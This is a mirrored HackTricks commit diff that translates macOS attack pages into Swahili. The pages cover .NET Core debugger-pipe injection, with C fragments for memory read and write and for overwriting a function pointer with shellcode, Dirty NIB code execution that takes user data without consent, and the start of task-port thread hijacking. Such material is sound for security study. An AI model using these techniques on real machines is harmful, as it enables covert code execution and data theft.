Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

Browse source
This commit is contained in:
Translator 2024-07-19 05:19:21 +00:00
parent ba67eb8b15
commit 15259f8260
82 changed files with 3242 additions and 4347 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

76
macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
View file

@ -1,30 +1,31 @@
# Uingizaji wa Programu za .Net kwenye macOS
# macOS .Net Applications Injection
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Hii ni muhtasari wa chapisho [https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/](https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/). Angalia kwa maelezo zaidi!**
## Udukuzi wa .NET Core <a href="#net-core-debugging" id="net-core-debugging"></a>
## .NET Core Debugging <a href="#net-core-debugging" id="net-core-debugging"></a>
### **Kuanzisha Kikao cha Udukuzi** <a href="#net-core-debugging" id="net-core-debugging"></a>
### **Kuweka Kikao cha Ufuatiliaji** <a href="#net-core-debugging" id="net-core-debugging"></a>
Usimamizi wa mawasiliano kati ya kudukuzi na programu inayodukuliwa katika .NET unadhibitiwa na [**dbgtransportsession.cpp**](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp). Sehemu hii inaweka mabomba mawili yaliyopewa jina kwa kila mchakato wa .NET kama ilivyoonekana katika [dbgtransportsession.cpp#L127](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L127), ambayo huanzishwa kupitia [twowaypipe.cpp#L27](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/debug-pal/unix/twowaypipe.cpp#L27). Mabomba haya yanamaliziwa na **`-in`** na **`-out`**.
Usimamizi wa mawasiliano kati ya debugger na debuggee katika .NET unashughulikiwa na [**dbgtransportsession.cpp**](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp). Kipengele hiki kinaanzisha bomba mbili zenye majina kwa kila mchakato wa .NET kama inavyoonekana katika [dbgtransportsession.cpp#L127](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L127), ambazo zinaanzishwa kupitia [twowaypipe.cpp#L27](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/debug-pal/unix/twowaypipe.cpp#L27). Mabomba haya yanaishia na **`-in`** na **`-out`**.
Kwa kutembelea **`$TMPDIR`** ya mtumiaji, mtu anaweza kupata mabomba ya udukuzi yanayopatikana kwa ajili ya programu za .Net.
Kwa kutembelea **`$TMPDIR`** ya mtumiaji, mtu anaweza kupata FIFOs za ufuatiliaji zinazopatikana kwa ajili ya ufuatiliaji wa programu za .Net.
[**DbgTransportSession::TransportWorker**](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L1259) inahusika na usimamizi wa mawasiliano kutoka kwa kudukuzi. Ili kuanzisha kikao kipya cha udukuzi, kudukuzi lazima atume ujumbe kupitia mabomba ya `out` ukiwa na muundo wa `MessageHeader` struct, ulioelezewa kwa undani katika msimbo wa chanzo wa .NET:
[**DbgTransportSession::TransportWorker**](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L1259) inawajibika kwa usimamizi wa mawasiliano kutoka kwa debugger. Ili kuanzisha kikao kipya cha ufuatiliaji, debugger lazima itume ujumbe kupitia bomba la `out` linaloanza na muundo wa `MessageHeader`, ulioelezwa katika msimbo wa chanzo wa .NET:
```c
struct MessageHeader {
MessageType m_eType; // Message type
@ -43,7 +44,7 @@ DWORD m_dwMinorVersion;
BYTE m_sMustBeZero[8];
}
```
Kuomba kikao kipya, muundo huu unajazwa kama ifuatavyo, ukiweka aina ya ujumbe kuwa `MT_SessionRequest` na toleo la itifaki kuwa toleo la sasa:
Ili kuomba kikao kipya, muundo huu unajazwa kama ifuatavyo, ukipanga aina ya ujumbe kuwa `MT_SessionRequest` na toleo la protokali kuwa toleo la sasa:
```c
static const DWORD kCurrentMajorVersion = 2;
static const DWORD kCurrentMinorVersion = 0;
@ -54,18 +55,18 @@ sSendHeader.TypeSpecificData.VersionInfo.m_dwMajorVersion = kCurrentMajorVersion
sSendHeader.TypeSpecificData.VersionInfo.m_dwMinorVersion = kCurrentMinorVersion;
sSendHeader.m_cbDataBlock = sizeof(SessionRequestData);
```
Kichwa hiki kisha kinatumwa kwa lengo kwa kutumia `write` syscall, ikifuatiwa na `sessionRequestData` struct inayojumuisha GUID kwa kikao:
Hii kichwa kisha kinatumwa kwa lengo kwa kutumia syscall ya `write`, ikifuatwa na muundo wa `sessionRequestData` unao zawadi ya GUID kwa ajili ya kikao:
```c
write(wr, &sSendHeader, sizeof(MessageHeader));
memset(&sDataBlock.m_sSessionID, 9, sizeof(SessionRequestData));
write(wr, &sDataBlock, sizeof(SessionRequestData));
```
Operesheni ya kusoma kwenye bomba la `out` inathibitisha mafanikio au kushindwa kwa kuanzisha kikao cha kurekebisha makosa:
Operesheni ya kusoma kwenye bomba la `out` inathibitisha mafanikio au kushindwa kwa kuanzishwa kwa kikao cha ufuatiliaji:
```c
read(rd, &sReceiveHeader, sizeof(MessageHeader));
```
## Kusoma Kumbukumbu
Marudio ya kubugia yameanzishwa, kumbukumbu inaweza kusomwa kwa kutumia aina ya ujumbe [`MT_ReadMemory`](https://github.com/dotnet/runtime/blob/f3a45a91441cf938765bafc795cbf4885cad8800/src/coreclr/src/debug/shared/dbgtransportsession.cpp#L1896). Kazi ya kusoma kumbukumbu imefafanuliwa, ikitekeleza hatua zinazohitajika kutuma ombi la kusoma na kupata jibu.
Mara tu kikao cha ufuatiliaji kimeanzishwa, kumbukumbu inaweza kusomwa kwa kutumia [`MT_ReadMemory`](https://github.com/dotnet/runtime/blob/f3a45a91441cf938765bafc795cbf4885cad8800/src/coreclr/src/debug/shared/dbgtransportsession.cpp#L1896) aina ya ujumbe. Kazi readMemory inaelezewa kwa undani, ikifanya hatua zinazohitajika kutuma ombi la kusoma na kupata jibu:
```c
bool readMemory(void *addr, int len, unsigned char **output) {
// Allocation and initialization
@ -77,11 +78,11 @@ bool readMemory(void *addr, int len, unsigned char **output) {
return true;
}
```
Uthibitisho kamili wa dhana (POC) inapatikana [hapa](https://gist.github.com/xpn/95eefc14918998853f6e0ab48d9f7b0b).
The complete proof of concept (POC) is available [here](https://gist.github.com/xpn/95eefc14918998853f6e0ab48d9f7b0b).
## Kuandika Kumbukumbu
## Writing Memory
Vivyo hivyo, kumbukumbu inaweza kuandikwa kwa kutumia kazi ya `writeMemory`. Mchakato unahusisha kuweka aina ya ujumbe kuwa `MT_WriteMemory`, kisha kutoa anwani na urefu wa data, na hatimaye kutuma data:
Vivyo hivyo, kumbukumbu inaweza kuandikwa kwa kutumia kazi ya `writeMemory`. Mchakato unahusisha kuweka aina ya ujumbe kuwa `MT_WriteMemory`, kubainisha anwani na urefu wa data, na kisha kutuma data:
```c
bool writeMemory(void *addr, int len, unsigned char *input) {
// Increment IDs, set message type, and specify memory location
@ -93,37 +94,38 @@ bool writeMemory(void *addr, int len, unsigned char *input) {
return true;
}
```
POC inapatikana [hapa](https://gist.github.com/xpn/7c3040a7398808747e158a25745380a5).
The associated POC is available [here](https://gist.github.com/xpn/7c3040a7398808747e158a25745380a5).
## .NET Core Utekelezaji wa Kanuni <a href="#net-core-code-execution" id="net-core-code-execution"></a>
## .NET Core Code Execution <a href="#net-core-code-execution" id="net-core-code-execution"></a>
Ili kutekeleza kanuni, mtu anahitaji kutambua eneo la kumbukumbu lenye ruhusa za rwx, ambalo linaweza kufanywa kwa kutumia vmmap -pages:
Ili kutekeleza msimbo, mtu anahitaji kubaini eneo la kumbukumbu lenye ruhusa za rwx, ambalo linaweza kufanywa kwa kutumia vmmap -pages:
```bash
vmmap -pages [pid]
vmmap -pages 35829 | grep "rwx/rwx"
```
Kupata mahali pa kubadilisha kidole cha kazi ni muhimu, na katika .NET Core, hii inaweza kufanywa kwa kulenga **Dynamic Function Table (DFT)**. Jedwali hili, lililoelezwa katika [`jithelpers.h`](https://github.com/dotnet/runtime/blob/6072e4d3a7a2a1493f514cdf4be75a3d56580e84/src/coreclr/src/inc/jithelpers.h), hutumiwa na runtime kwa kazi za msaada wa kompilisheni ya JIT.
Kuweka mahali pa kufuta kiashiria cha kazi ni muhimu, na katika .NET Core, hii inaweza kufanywa kwa kulenga **Dynamic Function Table (DFT)**. Meza hii, iliyoelezewa katika [`jithelpers.h`](https://github.com/dotnet/runtime/blob/6072e4d3a7a2a1493f514cdf4be75a3d56580e84/src/coreclr/src/inc/jithelpers.h), inatumika na mfumo wa uendeshaji kwa kazi za msaada wa JIT.
Kwa mifumo ya x64, unaweza kutumia utafutaji wa saini kupata marejeleo kwa ishara `_hlpDynamicFuncTable` katika `libcorclr.dll`.
Kwa mifumo ya x64, uwindaji wa saini unaweza kutumika kupata rejeleo kwa alama `_hlpDynamicFuncTable` katika `libcorclr.dll`.
Kazi ya kudebugi ya `MT_GetDCB` hutoa habari muhimu, ikiwa ni pamoja na anwani ya kazi ya msaada, `m_helperRemoteStartAddr`, inayoonyesha mahali pa `libcorclr.dll` katika kumbukumbu ya mchakato. Anwani hii kisha hutumiwa kuanza utafutaji wa DFT na kubadilisha kidole cha kazi na anwani ya shellcode.
Kazi ya ku-debug `MT_GetDCB` inatoa taarifa muhimu, ikiwa ni pamoja na anwani ya kazi ya msaada, `m_helperRemoteStartAddr`, ikionyesha mahali ambapo `libcorclr.dll` iko katika kumbukumbu ya mchakato. Anwani hii kisha inatumika kuanza kutafuta DFT na kufuta kiashiria cha kazi kwa anwani ya shellcode.
Msimbo kamili wa POC kwa kuingiza katika PowerShell unapatikana [hapa](https://gist.github.com/xpn/b427998c8b3924ab1d63c89d273734b6).
Msimu kamili wa POC wa sindano katika PowerShell unapatikana [hapa](https://gist.github.com/xpn/b427998c8b3924ab1d63c89d273734b6).
## Marejeo
## Marejeleo
* [https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/](https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

100
macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md
View file

@ -1,86 +1,88 @@
# macOS Dirty NIB
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Kwa maelezo zaidi kuhusu mbinu hii angalia chapisho la asili kutoka: [https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/).** Hapa kuna muhtasari:
**Kwa maelezo zaidi kuhusu mbinu hii angalia chapisho asilia kutoka: [https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/).** Hapa kuna muhtasari:
Faili za NIB, sehemu ya mfumo wa maendeleo wa Apple, zinatumika kwa kufafanua **vipengele vya UI** na mwingiliano wao katika programu. Zinaunda vitu vilivyosanidishwa kama madirisha na vitufe, na hulipwa wakati wa utekelezaji. Ingawa bado zinatumika, Apple sasa inapendekeza matumizi ya Storyboards kwa kuonyesha vizuri mtiririko wa UI.
Faili za NIB, sehemu ya mfumo wa maendeleo wa Apple, zinakusudia kufafanua **vipengele vya UI** na mwingiliano wao katika programu. Zinajumuisha vitu vilivyopangwa kama vile madirisha na vifungo, na hupakiwa wakati wa utendaji. Licha ya matumizi yao yaendelea, Apple sasa inapendekeza Storyboards kwa ajili ya uonyeshaji wa mtiririko wa UI wa kina zaidi.
### Wasiwasi wa Usalama na Faili za NIB
Ni muhimu kuzingatia kuwa **faili za NIB zinaweza kuwa hatari kwa usalama**. Zina uwezo wa **kutekeleza amri za kiholela**, na mabadiliko kwenye faili za NIB ndani ya programu hayazuizi Gatekeeper kutoka kutekeleza programu, hivyo kuwa tishio kubwa.
Ni muhimu kutambua kwamba **faili za NIB zinaweza kuwa hatari za usalama**. Zina uwezo wa **kutekeleza amri zisizo na mipaka**, na mabadiliko kwenye faili za NIB ndani ya programu hayazuia Gatekeeper kutekeleza programu hiyo, na kuleta tishio kubwa.
### Mchakato wa Uingizaji wa Dirty NIB
#### Kuunda na Kuweka Up Faili ya NIB
1. **Usanidi wa Awali**:
- Unda faili mpya ya NIB ukitumia XCode.
- Ongeza kitu kwenye kiolesura, ukiweka darasa lake kuwa `NSAppleScript`.
- Sanidi mali ya awali ya `source` kupitia Atributi za Wakati wa Utekelezaji Zilizofafanuliwa na Mtumiaji.
#### Kuunda na Kuweka Faili ya NIB
1. **Mipangilio ya Awali**:
- Unda faili mpya ya NIB kwa kutumia XCode.
- Ongeza Kitu kwenye kiolesura, ukipanga darasa lake kuwa `NSAppleScript`.
- Sanidi mali ya awali ya `source` kupitia Sifa za Wakati wa Uendeshaji Zilizofafanuliwa na Mtumiaji.
2. **Kifaa cha Utekelezaji wa Kanuni**:
- Usanidi huu unawezesha kukimbia AppleScript kwa ombi.
- Ingiza kitufe cha kuamsha kitu cha `Apple Script`, kwa kusababisha hasa chaguo la `executeAndReturnError:`.
2. **Kifaa cha Kutekeleza Msimbo**:
- Mipangilio hii inaruhusu kuendesha AppleScript kwa mahitaji.
- Jumuisha kifungo ili kuamsha kitu cha `Apple Script`, hasa kuanzisha mteule wa `executeAndReturnError:`.
3. **Jaribio**:
- Apple Script rahisi kwa ajili ya majaribio:
3. **Kujaribu**:
- Msimbo rahisi wa Apple Script kwa ajili ya majaribio:
```bash
set theDialogText to "PWND"
display dialog theDialogText
```
- Jaribu kwa kukimbia kwenye kichujio cha XCode na bonyeza kitufe.
- Jaribu kwa kuendesha kwenye debugger ya XCode na kubofya kifungo.
#### Kulenga Programu (Mfano: Pages)
1. **Maandalizi**:
- Nakili programu lengwa (k.m., Pages) kwenye saraka tofauti (k.m., `/tmp/`).
- Anzisha programu ili kuepuka matatizo ya Gatekeeper na kuihifadhi kwenye akiba.
- Nakili programu lengwa (mfano, Pages) kwenye saraka tofauti (mfano, `/tmp/`).
- Anzisha programu ili kuepuka matatizo ya Gatekeeper na kuikadiria.
2. **Kubadilisha Faili ya NIB**:
- Badilisha faili ya NIB iliyopo (k.m., About Panel NIB) na faili iliyoundwa ya DirtyNIB.
2. **Kufuta Faili ya NIB**:
- Badilisha faili ya NIB iliyopo (mfano, About Panel NIB) kwa faili ya DirtyNIB iliyoundwa.
3. **Utekelezaji**:
- Sababisha utekelezaji kwa kuingiliana na programu (k.m., kuchagua kipengee cha menyu ya `About`).
- Amsha utekelezaji kwa kuingiliana na programu (mfano, kuchagua kipengee cha menyu `About`).
#### Uthibitisho wa Dhana: Kupata Data ya Mtumiaji
- Badilisha AppleScript ili kupata na kuchambua data ya mtumiaji, kama picha, bila idhini ya mtumiaji.
#### Ushahidi wa Dhihirisho: Kupata Takwimu za Mtumiaji
- Badilisha AppleScript ili kufikia na kutoa takwimu za mtumiaji, kama picha, bila idhini ya mtumiaji.
### Mfano wa Kanuni: Faili ya .xib Iliyodhuru
- Pata na ukague [**mfano wa faili ya .xib iliyo dhahiri**](https://gist.github.com/xpn/16bfbe5a3f64fedfcc1822d0562636b4) ambayo inaonyesha utekelezaji wa nambari za kiholela.
### Mfano wa Msimbo: Faili ya .xib Mbaya
- Fikia na angalia [**mfano wa faili mbaya ya .xib**](https://gist.github.com/xpn/16bfbe5a3f64fedfcc1822d0562636b4) inayodhihirisha kutekeleza msimbo usio na mipaka.
### Kukabiliana na Vizuizi vya Kuzindua
- Vizuizi vya Kuzindua vinazuia utekelezaji wa programu kutoka maeneo yasiyotarajiwa (k.m., `/tmp`).
- Inawezekana kutambua programu ambazo hazilindwi na Vizuizi vya Kuzindua na kuzilenga kwa uingizaji wa faili za NIB.
### Kukabiliana na Vikwazo vya Uzinduzi
- Vikwazo vya Uzinduzi vinakwamisha utekelezaji wa programu kutoka maeneo yasiyotarajiwa (mfano, `/tmp`).
- Inawezekana kubaini programu ambazo hazijalindwa na Vikwazo vya Uzinduzi na kuzilenga kwa uingizaji wa faili za NIB.
### Kinga za Ziada za macOS
Kuanzia macOS Sonoma na kuendelea, marekebisho ndani ya vifurushi vya Programu yanazuiliwa. Walakini, njia za awali zilijumuisha:
1. Kunakili programu kwenye eneo tofauti (k.m., `/tmp/`).
2. Kubadilisha majina ya saraka ndani ya kifurushi cha programu ili kuepuka kinga za awali.
3. Baada ya kukimbia programu ili kujiandikisha na Gatekeeper, kubadilisha kifurushi cha programu (k.m., kubadilisha MainMenu.nib na Dirty.nib).
4. Kubadilisha majina ya saraka kurudi na kukimbia tena programu ili kutekeleza faili ya NIB iliyoingizwa.
### Ulinzi wa ziada wa macOS
Kuanzia macOS Sonoma, mabadiliko ndani ya vifurushi vya Programu yamezuiliwa. Hata hivyo, mbinu za awali zilihusisha:
1. Nakala ya programu kwenye eneo tofauti (mfano, `/tmp/`).
2. Kubadilisha majina ya saraka ndani ya kifurushi cha programu ili kupita ulinzi wa awali.
3. Baada ya kuendesha programu ili kujiandikisha na Gatekeeper, kubadilisha kifurushi cha programu (mfano, kubadilisha MainMenu.nib na Dirty.nib).
4. Kubadilisha majina ya saraka nyuma na kuendesha tena programu ili kutekeleza faili ya NIB iliyounganishwa.
**Kumbuka**: Sasisho za hivi karibuni za macOS zimezuia udanganyifu huu kwa kuzuia marekebisho ya faili ndani ya vifurushi vya programu baada ya akiba ya Gatekeeper, hivyo kufanya udanganyifu huu usifanikiwe.
**Kumbuka**: Sasisho za hivi karibuni za macOS zimepunguza exploit hii kwa kuzuia mabadiliko ya faili ndani ya vifurushi vya programu baada ya caching ya Gatekeeper, na kufanya exploit hiyo isifanye kazi.
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

147
macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md
View file

@ -1,68 +1,69 @@
# Uingizaji wa Thread kwenye macOS kupitia Task port
# macOS Thread Injection via Task port
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Kanuni
## Code
* [https://github.com/bazad/threadexec](https://github.com/bazad/threadexec)
* [https://gist.github.com/knightsc/bd6dfeccb02b77eb6409db5601dcef36](https://gist.github.com/knightsc/bd6dfeccb02b77eb6409db5601dcef36)
## 1. Udukuzi wa Thread
## 1. Thread Hijacking
Kwanza, kazi ya **`task_threads()`** inaitwa kwenye task port ili kupata orodha ya nyuzi kutoka kwa kazi ya mbali. Nyuzi moja inachaguliwa kwa udukuzi. Njia hii inatofautiana na njia za kawaida za kuingiza nambari kama kuunda nyuzi mpya ya mbali imezuiwa kutokana na kinga mpya inayozuia `thread_create_running()`.
